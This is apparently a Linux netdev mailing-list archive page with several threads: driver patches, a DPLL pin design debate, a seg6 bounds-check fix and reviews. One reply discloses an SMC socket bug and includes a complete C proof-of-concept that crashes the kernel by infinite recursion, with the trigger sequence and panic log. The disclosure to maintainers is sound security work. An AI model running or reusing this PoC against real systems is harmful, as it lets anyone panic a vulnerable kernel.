Thu, Jun 18, 2026 at 01:44:11AM +0200, kuba@kernel.org wrote:
>On Wed, 17 Jun 2026 11:26:46 +0200 Andrew Lunn wrote:
>> On Tue, Jun 16, 2026 at 04:29:59PM -0700, Jacob Keller wrote:
>> > On 6/15/2026 6:32 PM, Ziran Zhang wrote:
>> > > In ofdpa_port_fdb(), the hash_del() only unlinks the node from
>> > > hash table, but does not free it.
>> > >
>> > > Fix this by adding kfree(found) after the !found == removing check,
>> > > where the pointer value is no longer needed.
>> > >
>> > > Found by Coccinelle kfree script.
>>
>> Is rocker actually used any more? I'm not too sure of the history, but
>> was it not added as a way to develop the early switchdev code? There
>> was a qemu implementation of the 'hardware'?
>>
>> Is it still useful? Should we actually just remove the driver?
>
>I think it came up before but I don't remember the conclusion :S
>We should either add rocker to NIPA or delete it. Jiri, WDYT?
Remove.
^ permalink raw reply
* RE: [Intel-wired-lan] [PATCH net v2] igb: only strip Rx timestamp header on the first buffer of a frame
From: Tjerk Kusters @ 2026-06-23 10:38 UTC (permalink / raw)
To: Kwapulinski, Piotr, Nguyen, Anthony L, Kitszel, Przemyslaw,
Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
Paolo Abeni, Richard Cochran, Jesper Dangaard Brouer,
Kurt Kanzenbach
Cc: intel-wired-lan@lists.osuosl.org, netdev@vger.kernel.org,
linux-kernel@vger.kernel.org, stable@vger.kernel.org
In-Reply-To: <BL1PR11MB59792FC9956781218FC85B66F3EE2@BL1PR11MB5979.namprd11.prod.outlook.com>
Hi,
> >
> > /* pull rx packet timestamp if available and valid */
> Is this comment up-to-date now ?
> Reviewed-by: Piotr Kwapulinski <piotr.kwapulinski@intel.com>
>
Good point, the comment doesn't fully match the code anymore. I'll update it in v3 to:
/* pull rx packet timestamp if available and valid; it is only
* present on the first buffer of a frame
*/
Thanks for the review.
Tjerk
^ permalink raw reply
* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: XIAO WU @ 2026-06-23 10:38 UTC (permalink / raw)
To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable
In-Reply-To: <20260619054815.176764-1-runyu.xiao@seu.edu.cn>
Hi Runyu,
Thanks for this patch.
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
> {
> struct smc_sock *lsmc;
>
> + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> + return;
> +
> read_lock_bh(&listen_clcsock->sk_callback_lock);
> lsmc = smc_clcsock_user_data(listen_clcsock);
The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.
Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:
https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@seu.edu.cn
The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):
smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;
smc->af_ops = *smc->ori_af_ops;
smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;
inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;
if (smc->limit_smc_hs)
tcp_sk(smc->clcsock->sk)->smc_hs_congested =
smc_hs_congested;
rc = kernel_listen(smc->clcsock, backlog);
if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
&smc->clcsk_data_ready);
rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
goto out;
}
The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock). I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.
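The pointer state can be modelled in a few lines of userspace C. This is a
sketch under assumptions, not kernel code: all sketch_* names are made up,
listen_rc stands in for the result of kernel_listen(), and the
restore_on_error branch is only one plausible shape for a fix.

```c
#include <assert.h>
#include <stddef.h>

struct sketch_af_ops {
	int (*syn_recv_sock)(void);
};

struct sketch_sock {
	const struct sketch_af_ops *icsk_af_ops; /* ops installed on the clcsock */
	const struct sketch_af_ops *ori_af_ops;  /* ops saved before wrapping */
	struct sketch_af_ops af_ops;             /* wrapper copy */
};

static int sketch_tcp_syn_recv(void) { return 0; }
static int sketch_smc_syn_recv(void) { return 1; }
static const struct sketch_af_ops sketch_tcp_ops = { sketch_tcp_syn_recv };

/* Mirrors the save/wrap/install sequence quoted above. */
static int sketch_listen(struct sketch_sock *s, int listen_rc,
			 int restore_on_error)
{
	assert(s != NULL && s->icsk_af_ops != NULL);
	s->ori_af_ops = s->icsk_af_ops;
	s->af_ops = *s->ori_af_ops;
	s->af_ops.syn_recv_sock = sketch_smc_syn_recv;
	s->icsk_af_ops = &s->af_ops;

	/* Hypothetical fix: put the original ops back when listen fails. */
	if (listen_rc && restore_on_error)
		s->icsk_af_ops = s->ori_af_ops;
	return listen_rc;
}
```

Without the restore, a failed call followed by a successful one leaves
ori_af_ops pointing at the wrapper itself, so calling through
ori_af_ops->syn_recv_sock would re-enter the SMC hook.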
=== Reproduction ===
Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2
Trigger sequence:
1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
→ clcsock gets SO_REUSEADDR via smc_bind() copy
2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
→ Both non-TCP_LISTEN at bind time → bind OK
→ C enters TCP_LISTEN after its listen()
3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
→ icsk_af_ops NOT restored → clcsock points to wrapper
4. Close TCP C (free port), listen(A) again → succeeds
→ ori_af_ops now points to wrapper with syn_recv_sock =
smc_tcp_syn_recv_sock
5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
→ infinite recursion → IRQ stack guard page hit → kernel panic
=== Full PoC ===
Compile with: gcc -o poc poc.c -static
// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif
int main(void)
{
int smc_a, tcp_c, client;
struct sockaddr_in addr;
pid_t child;
int status, ret;
socklen_t len;
int val;
printf("=== SMC listen error path -> stack overflow PoC ===\n\n");
/* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
printf("[1] Create SMC socket A with SO_REUSEADDR\n");
smc_a = socket(PF_SMC, SOCK_STREAM, 0);
if (smc_a < 0) { perror("smc socket"); return 1; }
val = 1;
setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = 0;
if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("bind smc_a"); close(smc_a); return 1;
}
len = sizeof(addr);
if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
perror("getsockname"); close(smc_a); return 1;
}
int port = ntohs(addr.sin_port);
printf(" SMC A bound to port %d\n", port);
/* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
tcp_c = socket(AF_INET, SOCK_STREAM, 0);
val = 1;
setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons(port);
if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
}
if (listen(tcp_c, 5) < 0) {
perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
}
printf(" TCP C listening on port %d\n", port);
/* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
printf("[3] listen(SMC A) — expect failure... ");
fflush(stdout);
ret = listen(smc_a, 5);
if (ret == 0) {
printf("succeeded! Unexpected.\n");
close(tcp_c); close(smc_a);
return 1;
}
printf("failed: %s\n", strerror(errno));
/* Step 4: Close TCP C to free the port */
printf("[4] Close TCP C to free port %d\n", port);
close(tcp_c);
sleep(1);
/* Step 5: listen(A) again → succeeds but ori_af_ops is self-referential */
printf("[5] listen(SMC A) again... ");
fflush(stdout);
ret = listen(smc_a, 5);
if (ret < 0) {
printf("failed: %s, retrying...\n", strerror(errno));
sleep(2);
ret = listen(smc_a, 5);
}
if (ret < 0) {
perror("retry"); close(smc_a); return 1;
}
printf("succeeded! ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock\n");
/* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK OVERFLOW */
printf("[6] TCP connect → triggers infinite recursion...\n");
fflush(stdout);
child = fork();
if (child == 0) {
client = socket(AF_INET, SOCK_STREAM, 0);
if (client < 0) exit(1);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(port);
if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
perror("connect");
exit(1);
}
sleep(3);
close(client);
exit(0);
}
printf("Waiting for crash...\n");
sleep(5);
if (waitpid(child, &status, WNOHANG) == 0) {
printf("Child still alive — check dmesg\n");
kill(child, SIGKILL);
waitpid(child, NULL, 0);
}
close(smc_a);
return 0;
}
=== Crash Log ===
Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)
[ 1453.562682][ C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][ C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][ C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][ C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][ C0] Call Trace:
[ 1453.562970][ C0] <IRQ>
[ 1453.562980][ C0] lock_acquire+0x1ae/0x360
[ 1453.562995][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][ C0] smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][ C0] ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[... 15+ recursive frames ...]
[ 1453.564373][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][ C0] RIP: 0033:0x423574
[ 1453.577319][ C0] Kernel panic - not syncing: Fatal exception in interrupt
The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.
Thanks,
Xiao
^ permalink raw reply
* Re: [PATCH net-next v5 1/4] dpll: add DPLL_PIN_TYPE_INT_NCO pin type
From: Jiri Pirko @ 2026-06-23 10:37 UTC (permalink / raw)
To: Ivan Vecera
Cc: Kubalewski, Arkadiusz, Vadim Fedorenko, Jakub Kicinski,
netdev@vger.kernel.org, Jiri Pirko, David S. Miller,
Donald Hunter, Eric Dumazet, Schmidt, Michal, Paolo Abeni,
Vaananen, Pasi, Oros, Petr, Prathosh Satish, Simon Horman,
linux-kernel@vger.kernel.org
In-Reply-To: <23e47140-f69f-451d-9154-29071130c11c@redhat.com>
Fri, Jun 19, 2026 at 07:07:52PM +0200, ivecera@redhat.com wrote:
>On 6/17/26 1:59 PM, Kubalewski, Arkadiusz wrote:
>> > From: Ivan Vecera <ivecera@redhat.com>
>> > Sent: Monday, June 15, 2026 2:00 PM
>> >
>> > On 6/11/26 2:09 PM, Jiri Pirko wrote:
>> > > Wed, Jun 10, 2026 at 05:45:46PM +0200, ivecera@redhat.com wrote:
>> > > > On 6/10/26 3:04 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > Sent: Tuesday, June 9, 2026 4:59 PM
>> > > > > >
>> > > > > > On 6/9/26 4:00 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > > > From: Jiri Pirko <jiri@resnulli.us>
>> > > > > > > > Sent: Tuesday, June 9, 2026 10:51 AM
>> > > > > > > >
>> > > > > > > > Mon, Jun 08, 2026 at 07:03:46PM +0200,
>> > > > > > > > arkadiusz.kubalewski@intel.com
>> > > > > > > > wrote:
>> > > > > > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > > > > > Sent: Monday, June 8, 2026 5:48 PM
>> > > > > > > > > >
>> > > > > > > > > > On 6/8/26 4:43 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > > > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > > > > > > > Sent: Sunday, May 31, 2026 9:44 PM ...
>> > > > > > > > > > > > -
>> > > > > > > > > > > > name: gnss
>> > > > > > > > > > > > doc: GNSS recovered clock
>> > > > > > > > > > > > + -
>> > > > > > > > > > > > + name: int-nco
>> > > > > > > > > > > > + doc: |
>> > > > > > > > > > > > + Device internal numerically controlled oscillator.
>> > > > > > > > > > > > + When connected as a DPLL input, the DPLL enters NCO
>> > > > > > > > > > > > mode
>> > > > > > > > > > > > + where the output frequency is adjusted by the host
>> > > > > > > > > > > > via
>> > > > > > > > > > > > + the PTP clock interface.
>> > > > > > > > > > >
>> > > > > > > > > > > Hi Ivan!
>> > > > > > > > > > >
>> > > > > > > > > > > How would you control this in case of automatic mode dpll?
>> > > > > > > > > > > Automatic mode DPLL shall be controlled on HW level, such pin
>> > > > > > > > > > > breaks that rule and requires some driver magic to show it is
>> > > > > > > > > > > higher priority than the rest of the pins?
>> > > > > > > > > >
>> > > > > > > > > > The NCO pin can be connected only in manual mode. In other words
>> > > > > > > > > > a
>> > > > > > > > > > DPLL in automatic mode cannot select NCO pin (switch to NCO mode)
>> > > > > > > > > > on
>> > > > > > > > > > its own.
>> > > > > > > > > >
>> > > > > > > > >
>> > > > > > > > > Being picky on DPLL_MODE for enabling feature is not something we
>> > > > > > > > > can allow if it is not related to HW limitation, is it?
>> > > > > > > > > Could you please elaborate why it is not possible for AUTOMATIC
>> > > > > > > > > mode?
>> > > > > > > >
>> > > > > > > > In automatic mode, the pin selection logic is defined upon prio. I
>> > > > > > > > can imagine that if NCO pin has the highest prio of the available
>> > > > > > > > ones, it gets picked. I would be aligned 100% with automatic mode
>> > > > > > > > behaviour.
>> > > > > > > > Is there a real usecase for it?
>> > > > > > > >
>> > > > > > > > [..]
>> > > > > > >
>> > > > > > > This is not true. AUTOMATIC mode is HW solution, SW driver ONLY
>> > > > > > > configures priorities on the inputs, not manages the active inputs.
>> > > > > > > This breaks that behavior: the SW driver would have to manually
>> > > > > > > override the AUTOMATIC mode to be fed from such an NCO pin, as it doesn't
>> > > > > > > exist on its priority list, so HW cannot pick or use it.
>> > > > > >
>> > > > > > Correct, AUTO mode is hardware feature and it should not be emulated
>> > > > > > by a
>> > > > > > driver. If the hardware does not support it then the switching
>> > > > > > between
>> > > > > > input references should be done by userspace (by monitoring ffo,
>> > > > > > phase_offset, operstate).
>> > > > > >
>> > > > >
>> > > > > Yes, exactly, so for AUTOMATIC mode HW it will not be possible to
>> > > > > create such pin, which means that NCO pin would serve only a MANUAL
>> > > > > mode implementation.
>> > > > > Basically this is something we shall not allow to happen. DPLL API
>> > > > > should be designed to cover the case where AUTO mode is able to
>> > > > > implement all features consistently.
>> > > >
>> > > > If you don't like the proposal from Jiri (NCO switch driven by NCO pin
>> > > > priority -> highest==enter_nco else leave_nco) then it could be
>> > > > possible to handle the switching by allowing the state 'connected' in
>> > > > AUTO mode for the NCO pin type. Then the implementation will be the
>> > > > same for both selection modes.
>> > > >
>> > > > Only difference would be that a user does not need to switch the device
>> > > > from the AUTO to MANUAL mode.
>> > > >
>> > > > > > > The real use case is that any DPLL can switch the mode to this one
>> > > > > > > instead of implementing MANUAL mode just to use the feature with a
>> > > > > > > 'virtual' pin.
>> > > > > >
>> > > > > > I don't expect this... but it is up to a driver. I don't plan such
>> > > > > > functionality in zl3073x as the NCO pin does not expose prio_get()
>> > > > > > and prio_set() callbacks - so it is clear that this pin cannot be
>> > > > > > part of the automatic selection.
>> > > > > >
>> > > > > > Ivan
>> > > > >
>> > > > > There is a difference between particular HW and API capabilities, with
>> > > > > the proposed API we would disallow the possibility of such
>> > > > > implementation for existing HW variants.
>> > > > >
>> > > > > DPLL NCO MODE would allow that but as pointed here by Ivan and by Jiri
>> > > > > in the other email it would also require the extra implementation for
>> > > > > some configuration - device level phase/ffo handling.
>> > > > >
>> > > > > To summarize it all, I don't have such simple solution for it.
>> > > > >
>> > > > > First thing that comes to my mind is to combine both approaches.
>> > > > > Make it possible for AUTOMATIC mode to also set "CONNECTED" state
>> > > > > on certain kind of "OVERRIDE" pins, where it could be determined by
>> > > > > the type of PIN and embed that logic into the DPLL subsystem.
>> > > >
>> > > > The possible states for particular pins are now handled at a driver
>> > > > level so the driver decides if the requested state is correct or not.
>> > > > So it could be easy to implement this.
>> > > >
>> > > > For auto mode allowed states:
>> > > > - input references: selectable / disconnected
>> > > > - nco pin: connected / disconnected
>> > > >
>> > > > > Basically, if driver registers such NCO pin it would be always
>> > > > > selected manually, and in such case all the other pins are going to
>> > > > > disconnected state while DPLL mode is also a "OVERRIDE" or something
>> > > > > like it.
>> > > >
>> > > > I would leave this decision on the driver level... Imagine the
>> > > > potential HW that would allow to switch NCO mode if there is no valid
>> > > > input reference.
>> > > >
>> > > > Example:
>> > > >
>> > > > REF0 (prio 0) -> +------+ -> OUT0
>> > > > REF1 (prio 1) -> | DPLL | -> ...
>> > > > NCO (prio 2) -> +------+ -> OUTn
>> > > >
>> > > > Such HW would prefer REF0 or REF1 and lock to one of them if they are
>> > > > qualified. But if they are NOT, then it switches to NCO mode.
>>
>> Now you said yourself "NCO mode" ... I agree that it would be a mode in
>> that case. Where instead of running on regular/built in XO dpll would run
>> on NCO and user could select it, and this would be addition to regular
>> behavior.
>>
>> I also agree that the pin approach might be better/easier to use, assuming
>> frequency offset for all the outputs given dpll drives, it makes more sense
>> to have it configurable on input side.
>
>+1
>
>> > > >
>> > > > In this situation the relevant driver would allow to configure priority
>> > > > and state 'selectable' for this NCO pin.
>> > > >
>> > > > > Perhaps the pin type could include OVERRIDE in its name to make it
>> > > > > less confusing and needs some extra documentation.
>> > > > >
>> > > > > Thoughts?
>> > > > I think _INT_ is ok. In the case of TYPE_INT_OSCILLATOR it is also
>> > > > obvious that it is not a standard input reference.
>> > > >
>> > > > Jiri, Vadim, Arek, thoughts?
>> > >
>> > > I agree with you, the driver should have the flexibility to implement
>> > > this according to his/hw's needs/capabilities. If it implements prio
>> > > selection in AUTO mode, let it have it. If it implements manual NCO pin
>> > > selection in AUTO mode using connected/disconnected override, let it
>> > > have it.
>>
>> I don't know 'current' HW that is capable of using AUTO mode as a part of
>> HW-based priority source selection and use such NCO input..
>> But as already explained above, this is special mode of regular XO, which
>> allows DPLL's output frequency offset configuration.
>
>Let's keep this available for potential future HW. I can imagine a
>situation where a user will prefer an automatic switch to NCO mode
>if there is no qualified input reference - automatic switch means
>that HW will support this (not emulated by the driver).
>
>> > >
>> > > Moreover, I actually like the "override" capability for pins in AUTO
>> > > mode in general. It may be handy for other usecases as well.
>> > >
>> > Arek? Vadim?
>> >
>> > Thanks,
>> > Ivan
>>
>> Agree, 'override' capability of a pin would be the way to go for this and
>> other similar further cases.
>>
>> I believe a single approach on this would be best, I mean if AUTO mode
>> needs a capability, to switch from regular behavior to 'OVERRIDE', and
>> 'OVERRIDE' is only pin capability that allows such behavior for AUTO
>> mode, then similar approach should be used on MANUAL mode, to make
>> userspace know that such pin is always available to set "CONNECTED"
>> and make the userspace implementation consistent on enabling it no matter
>> if AUTO or MANUAL mode dpll.
>
>Proposal:
>1) new pin capability
> - name: state-connected-override
> - doc: pin state can be changed to connected in any DPLL mode
Needs a bit more description I think in real patch.
>
>2) new NCO pin type to switch the DPLL to NCO mode when connected
Say "NCO hw mode" to avoid confusion (I already spotted such a bit
earlier in this thread)
>
>3) automatic-only DPLL
> - should expose NCO pin with state-connected-override capability
>
>4) manual-only DPLL
> - does not need to expose NCO pin with state-connected-override cap
>
>5) dual-mode DPLL (supporting mode switching)
> - if it exposes NCO pin with the override cap then it has to support
> switching to NCO mode directly from AUTO mode
> - if it does not expose NCO pin with the override cap then a user MUST
> switch the DPLL mode from AUTO to MANUAL to be able to make NCO
> pin connected to the DPLL
>
>Vadim, Jiri, Arek - thoughts?
Agreed.
>
>Thanks,
>Ivan
>
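
The state rules in the proposal above can be sketched as a small
userspace C check. This is only an illustration under stated
assumptions, not code from the DPLL subsystem: every demo_*/DEMO_* name
is hypothetical, and it encodes just the baseline rule (connected is
valid in manual mode, or in any mode when the pin carries the proposed
state-connected-override capability). A real driver could allow more,
for example 'selectable' plus a priority for an NCO pin.

```c
#include <stdbool.h>

/* Hypothetical stand-ins for the DPLL mode and pin state enums. */
enum demo_mode { DEMO_MODE_MANUAL, DEMO_MODE_AUTOMATIC };

enum demo_pin_state {
	DEMO_STATE_CONNECTED,
	DEMO_STATE_DISCONNECTED,
	DEMO_STATE_SELECTABLE,
};

/* Hypothetical bit for the proposed state-connected-override capability. */
#define DEMO_CAP_STATE_CONNECTED_OVERRIDE (1u << 0)

struct demo_pin {
	unsigned int caps;
};

/* Return true if @state may be requested for @pin while the DPLL is in @mode. */
static bool demo_pin_state_allowed(enum demo_mode mode,
				   const struct demo_pin *pin,
				   enum demo_pin_state state)
{
	switch (state) {
	case DEMO_STATE_DISCONNECTED:
		/* Disconnecting is valid in either mode. */
		return true;
	case DEMO_STATE_SELECTABLE:
		/* Only meaningful when HW does priority-based selection. */
		return mode == DEMO_MODE_AUTOMATIC;
	case DEMO_STATE_CONNECTED:
		/* Manual mode, or any mode if the pin has the override cap. */
		return mode == DEMO_MODE_MANUAL ||
		       (pin->caps & DEMO_CAP_STATE_CONNECTED_OVERRIDE);
	}
	return false;
}
```

With this shape, userspace can request 'connected' on an NCO pin that
advertises the override capability without first checking or switching
the DPLL mode, which is the consistency argument made earlier in the
thread.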
^ permalink raw reply
* [PATCH net v2] seg6: validate SRH length before reading fixed fields
From: Nuoqi Gui @ 2026-06-23 10:32 UTC (permalink / raw)
To: David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Simon Horman, Andrea Mayer
Cc: netdev, bpf, linux-kernel, Nuoqi Gui, Mathieu Xhonneux,
Daniel Borkmann, David Lebrun
seg6_validate_srh() reads fixed SRH fields such as srh->type and
srh->hdrlen before checking that the supplied length covers the fixed
struct ipv6_sr_hdr fields.
The BPF SEG6 encap path reaches this with a BPF program-supplied pointer
and length: bpf_lwt_push_encap() and the SEG6 local BPF END_B6 and
END_B6_ENCAP actions call bpf_push_seg6_encap(), which forwards the
length to seg6_validate_srh() with no minimum-size guard. A 2-byte SEG6
encap header can therefore make the validator read srh->type at offset 2
beyond the caller-supplied buffer.
Reject lengths shorter than the fixed SRH at the top of
seg6_validate_srh(), before any field is read. This fixes the BPF helper
path and keeps the common validator robust.
Fixes: fe94cc290f53 ("bpf: Add IPv6 Segment Routing helpers")
Signed-off-by: Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>
---
Changes in v2:
- Narrowed the commit message to the BPF encap callers that can supply a
too-short SRH length.
- Dropped the unnecessary cast in the minimum SRH length check.
- Link to v1: https://patch.msgid.link/20260620-f01-17-seg6-srh-len-v1-1-36cbb29c12f1@mails.tsinghua.edu.cn
To: Andrea Mayer <andrea.mayer@uniroma2.it>
To: "David S. Miller" <davem@davemloft.net>
To: Eric Dumazet <edumazet@google.com>
To: Jakub Kicinski <kuba@kernel.org>
To: Paolo Abeni <pabeni@redhat.com>
To: Simon Horman <horms@kernel.org>
To: Mathieu Xhonneux <m.xhonneux@gmail.com>
To: Daniel Borkmann <daniel@iogearbox.net>
To: David Lebrun <dlebrun@google.com>
Cc: netdev@vger.kernel.org
Cc: linux-kernel@vger.kernel.org
Cc: bpf@vger.kernel.org
---
net/ipv6/seg6.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
index 1c3ad25700c4c..62a7eb7792026 100644
--- a/net/ipv6/seg6.c
+++ b/net/ipv6/seg6.c
@@ -29,6 +29,9 @@ bool seg6_validate_srh(struct ipv6_sr_hdr *srh, int len, bool reduced)
int max_last_entry;
int trailing;
+ if (len < sizeof(*srh))
+ return false;
+
if (srh->type != IPV6_SRCRT_TYPE_4)
return false;
---
base-commit: 96e7f9122aae0ed000ee321f324b812a447906d9
change-id: 20260619-f01-17-seg6-srh-len-a85f35427e0b
Best regards,
--
Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>
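
For readers following along, the "check the length before reading any
fixed field" pattern described in the commit message can be sketched in
userspace C. This is a minimal illustration, not the kernel function:
struct demo_srh, DEMO_SRCRT_TYPE_4 and demo_validate_srh() are
hypothetical stand-ins, the 8-byte layout is an assumption modelled on
the fixed part of an SRH, and the length is taken as size_t here so the
comparison against sizeof() has no signed/unsigned conversion.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical 8-byte fixed header, modelled on the fixed SRH fields. */
struct demo_srh {
	uint8_t nexthdr;
	uint8_t hdrlen;		/* length in 8-byte units, not counting the first 8 bytes */
	uint8_t type;
	uint8_t segments_left;
	uint8_t first_segment;
	uint8_t flags;
	uint16_t tag;
};

#define DEMO_SRCRT_TYPE_4 4

/* Validate a caller-supplied buffer without reading past @len bytes. */
static bool demo_validate_srh(const uint8_t *buf, size_t len)
{
	struct demo_srh srh;

	/* Reject short buffers before any field is touched. */
	if (len < sizeof(srh))
		return false;

	/* Copy the fixed part out; this also avoids unaligned access. */
	memcpy(&srh, buf, sizeof(srh));

	if (srh.type != DEMO_SRCRT_TYPE_4)
		return false;

	/* The length encoded in the header must match the supplied length. */
	return ((size_t)srh.hdrlen + 1) * 8 == len;
}
```

A 2-byte buffer, as in the case described above, is rejected by the
first check, so the type byte at offset 2 is never read.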
^ permalink raw reply related
* Re: [PATCH iwl-net] ice: clear the default forwarding VSI rule when releasing a VSI
From: Simon Horman @ 2026-06-23 10:29 UTC (permalink / raw)
To: poros
Cc: Simon Horman, netdev, anthony.l.nguyen, przemyslaw.kitszel,
andrew+netdev, davem, edumazet, kuba, pabeni, jacob.e.keller,
michal.swiatkowski, intel-wired-lan, linux-kernel
In-Reply-To: <20260622081030.2312129-1-poros@redhat.com>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
---
ice: clear the default forwarding VSI rule when releasing a VSI
This patch restores the cleanup of the default forwarding VSI rule
in ice_vsi_release(), clearing it when the VSI owns it. This prevents
a rule leak if a trusted VF enters promiscuous mode and is then destroyed.
> diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
> --- a/drivers/net/ethernet/intel/ice/ice_lib.c
> +++ b/drivers/net/ethernet/intel/ice/ice_lib.c
> @@ -2871,6 +2871,9 @@ int ice_vsi_release(struct ice_vsi *vsi)
> return -ENODEV;
> pf = vsi->back;
>
> + if (ice_is_vsi_dflt_vsi(vsi))
> + ice_clear_dflt_vsi(vsi);
> +
[Severity: High]
Is there a time-of-check to time-of-use race here?
ice_is_vsi_dflt_vsi() acquires and releases the filt_rule_lock to check if
the current VSI is the default. If true, ice_clear_dflt_vsi() is called,
which acquires the lock again during rule removal.
If the lock is dropped between these two calls, could another thread
establish a new default VSI rule before ice_clear_dflt_vsi() runs?
When ice_clear_dflt_vsi() executes, it appears the rule search only matches
by l_data and flag:
ice_switch.c:ice_find_rule_entry() {
if (!memcmp(&f_info->l_data, &list_itr->fltr_info.l_data,
sizeof(f_info->l_data)) &&
f_info->flag == list_itr->fltr_info.flag) {
...
}
For the default VSI rule, l_data is empty, so it might match any newly
established default rule.
